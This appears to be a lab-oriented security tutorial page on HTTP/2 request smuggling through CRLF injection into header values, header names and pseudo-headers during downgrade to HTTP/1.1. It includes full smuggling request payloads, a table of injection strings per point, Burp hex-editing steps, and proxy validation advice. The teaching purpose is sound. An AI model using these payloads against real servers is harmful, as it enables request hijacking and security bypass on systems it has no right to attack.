Advanced H2 Vulnerabilities

Overview

Beyond simple H2.CL and H2.TE attacks, more complex vulnerabilities arise from character handling differences between HTTP/1.1 and HTTP/2.

The Core Problem

HTTP/1.1 vs HTTP/2 Character Handling

Character

HTTP/1.1

HTTP/2

\r\n (CRLF)

Terminates header

No special meaning

: (colon)

Separates name:value

Allowed in values

Whitespace

Delimiter

Part of value

RFC 9113 Requirements

The HTTP/2 RFC mandates validation:

Field names MUST NOT contain:
- Characters 0x00-0x20 (non-visible + space)
- Uppercase A-Z (0x41-0x5a)
- 0x7f-0xff

Field values MUST NOT contain:
- NUL (0x00)
- LF (0x0a)
- CR (0x0d)

If proxy doesn't validate → Injection possible!

1. Request Header Injection

Technique

Inject CRLF in header value to add new headers.

HTTP/2 Request

:method         POST
:path           /
:authority      http2.htb
:scheme         https
dummy           asd\r\nTransfer-Encoding: chunked

0

GET /smuggled HTTP/1.1
Host: http2.htb

After Rewrite to HTTP/1.1

POST / HTTP/1.1
Host: http2.htb
Dummy: asd
Transfer-Encoding: chunked
Content-Length: 48

0

GET /smuggled HTTP/1.1
Host: http2.htb

What Happened

HTTP/2

HTTP/1.1

dummy: asd\r\nTransfer-Encoding: chunked

Dummy: asd

(single header)

Transfer-Encoding: chunked

(two headers!)

Result: H2.TE vulnerability created via header value injection.

2. Header Name Injection

Technique

Inject CRLF in header name to add new headers.

HTTP/2 Request

:method                              POST
:path                                /
:authority                           http2.htb
:scheme                              https
dummy: asd\r\nTransfer-Encoding      chunked

0

GET /smuggled HTTP/1.1
Host: http2.htb

After Rewrite to HTTP/1.1

POST / HTTP/1.1
Host: http2.htb
Dummy: asd
Transfer-Encoding: chunked
Content-Length: 48

0

GET /smuggled HTTP/1.1
Host: http2.htb

What Happened

HTTP/2 Header Name

HTTP/2 Value

HTTP/1.1 Result

dummy: asd\r\nTransfer-Encoding

chunked

Dummy: asd

Transfer-Encoding: chunked

Result: Same H2.TE vulnerability, different injection point.

3. Request Line Injection (Pseudo-Header)

Technique

Inject into pseudo-headers (:method, :path, etc.) which may bypass validation.

Why Pseudo-Headers?

Treated differently than regular headers
Validation checks may not apply
Directly construct HTTP/1.1 request line

HTTP/2 Request

:method     POST / HTTP/1.1\r\nTransfer-Encoding: chunked\r\nDummy: asd
:path       /
:authority  http2.htb
:scheme     https

0

GET /smuggled HTTP/1.1
Host: http2.htb

After Rewrite to HTTP/1.1

POST / HTTP/1.1
Transfer-Encoding: chunked
Dummy: asd / HTTP/1.1
Host: http2.htb
Content-Length: 48

0

GET /smuggled HTTP/1.1
Host: http2.htb

What Happened

The :method value becomes the entire request line + injected headers:

:method value: "POST / HTTP/1.1\r\nTransfer-Encoding: chunked\r\nDummy: asd"
                ↓
Request line:   POST / HTTP/1.1
Header 1:       Transfer-Encoding: chunked
Header 2:       Dummy: asd / HTTP/1.1  (path appended here)

Result: H2.TE via pseudo-header injection.

Injection Points Summary

Injection Point

Target

Example Payload

Header Value

Regular header value

dummy: asd\r\nTE: chunked

Header Name

Regular header name

dummy: x\r\nTE + value chunked

:method

Pseudo-header

POST / HTTP/1.1\r\nTE: chunked\r\nX: y

:path

Pseudo-header

/\r\nTE: chunked\r\nX: y

:authority

Pseudo-header

host\r\nTE: chunked

Testing in Burp

Inserting CRLF Characters

Switch to Hex view in Repeater
Find injection point
Insert:
- 0d = CR (\r)
- 0a = LF (\n)

Example: Header Value Injection

Original:  dummy: test
Hex edit:  dummy: asd[0d][0a]Transfer-Encoding: chunked

Viewing Pseudo-Headers

Open Inspector panel
Expand Request Attributes
Edit pseudo-header values directly

Detection Checklist

Test each injection point:

Why These Work

Vulnerable Proxy Behavior

1. Receives HTTP/2 request
2. Does NOT validate for forbidden characters
3. Blindly rewrites to HTTP/1.1
4. CRLF gains special meaning → headers injected

Secure Proxy Behavior

1. Receives HTTP/2 request
2. Validates all headers per RFC
3. Rejects requests with CR/LF/NUL
4. No injection possible

References

PreviousDowngrading Attacks NextTools & Prevention

Last updated 1 month ago

hashtagOverview

hashtagThe Core Problem

hashtagHTTP/1.1 vs HTTP/2 Character Handling

hashtagRFC 9113 Requirements

hashtag1. Request Header Injection

hashtagTechnique

hashtagHTTP/2 Request

hashtagAfter Rewrite to HTTP/1.1

hashtagWhat Happened

hashtag2. Header Name Injection

hashtagTechnique

hashtagHTTP/2 Request

hashtagAfter Rewrite to HTTP/1.1

hashtagWhat Happened

hashtag3. Request Line Injection (Pseudo-Header)

hashtagTechnique

hashtagWhy Pseudo-Headers?

hashtagHTTP/2 Request

hashtagAfter Rewrite to HTTP/1.1

hashtagWhat Happened

hashtagInjection Points Summary

hashtagTesting in Burp

hashtagInserting CRLF Characters

hashtagExample: Header Value Injection

hashtagViewing Pseudo-Headers

hashtagDetection Checklist

hashtagWhy These Work

hashtagVulnerable Proxy Behavior

hashtagSecure Proxy Behavior

hashtagReferences

Overview

The Core Problem

HTTP/1.1 vs HTTP/2 Character Handling

RFC 9113 Requirements

1. Request Header Injection

Technique

HTTP/2 Request

After Rewrite to HTTP/1.1

What Happened

2. Header Name Injection

Technique

HTTP/2 Request

After Rewrite to HTTP/1.1

What Happened

3. Request Line Injection (Pseudo-Header)

Technique

Why Pseudo-Headers?

HTTP/2 Request

After Rewrite to HTTP/1.1

What Happened

Injection Points Summary

Testing in Burp

Inserting CRLF Characters

Example: Header Value Injection

Viewing Pseudo-Headers

Detection Checklist

Why These Work

Vulnerable Proxy Behavior

Secure Proxy Behavior

References